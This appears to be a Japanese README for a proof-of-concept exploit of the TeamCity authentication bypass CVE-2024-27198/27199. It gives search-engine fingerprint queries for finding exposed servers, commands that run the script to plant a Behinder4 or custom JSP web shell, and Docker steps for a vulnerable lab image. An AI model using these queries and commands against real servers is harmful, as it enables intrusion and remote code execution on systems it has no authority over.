
CVE-2024-27198 および CVE-2024-27199 認証バイパス --> JetBrains TeamCity Pre-2023.11.4 における RCE
app="JET_BRAINS-TeamCity"
app:"JetBrains TeamCity"
product.name="TeamCity"
http.component:"teamcity"
Python3.9を使用しています。
pip install requests urllib3 faker
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 --behinder4
# python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 -f shell.jsp


また:
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111

Dockerを使用して脆弱なイメージをプルし、起動します:
sudo docker pull jetbrains/teamcity-server:2023.11.3
sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
# sudo ufw disable
その後、基本設定を行います:

